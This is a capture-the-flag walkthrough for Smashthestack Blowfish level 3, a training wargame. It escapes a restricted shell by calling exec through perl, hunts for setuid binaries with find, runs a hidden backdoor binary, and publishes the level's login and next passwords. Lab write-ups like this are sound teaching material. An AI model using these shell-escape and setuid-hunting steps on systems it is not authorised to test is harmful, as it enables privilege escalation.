Smashthestack Blowfish Level 03

To enter this level we have to ssh with password l3thal_Rul3Z!:

$ssh level3@blowfish.smashthestack.org -p2222
password: l3thal_Rul3Z!

 1. Thou shalt NOT root or otherwise harm the box.
     2. Thou shalt NOT access any other network from this box.
     3. Thou shalt NOT use any other directory besides /tmp or /code for code. 
     4. Thou shalt give the root pass to l3thal if you manage to change it.

     Passwords are in /pass.
     There is a README in each users home directory.
     /tmp && /var/tmp will be flushed daily by cron.
     Use /code plz for umm, code ;D
     IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
     The password for the last level will get you into
     Tux, the more advanced wargame. Join #blowfish on 
     irc.smashthestack.org with any questions. 

     Admins - l3thal && cr 

     Forum: http://smashthestack.org/viewforum.php?id=10

Last login: Fri Jan 29 14:32:54 2010 from indio.cespi.unlp.edu.ar

You are in a restricted shell. If you can break out of it, you need to find the backdoor hidden somewhere in the system. find it and cat /pass/level4

Here we find ourselves in a shell where we can only use some functions one of them is perl.
With perl we are able to avoid the restriction of the shell of not putting slashes in the command.

level3@blowfish:~$ perl -e "print exec('/usr/bin/id')"
uid=1005(level3) gid=1005(level3) groups=1005(level3)

And now we have to find the backdoor, the same way we did before:

level3@blowfish:~$ perl -e "print exec('/usr/bin/find / -perm -4000 -executable')"/usr/bin/find: `/root': Permission denied
/home/level3/..     /cat_lvl4
/bin/su
/bin/ping6
/bin/mount
/bin/umount
/usr/bin/false
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown

For space and clarity issues I removed all premission denied expressions. There is one file that attracts all the attention:
// /home/level3/.. /cat_lvl4 //

We execute it the same way we did with the find, escaping the spaces of the directory:

level3@blowfish:~$ perl -e "print exec('/home/level3/..\ \ \ \ \ /cat_lvl4')"
n3xt_l3v3l!

The password is: n3xt_l3v3l!

See you on the next level. Tutorial here.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License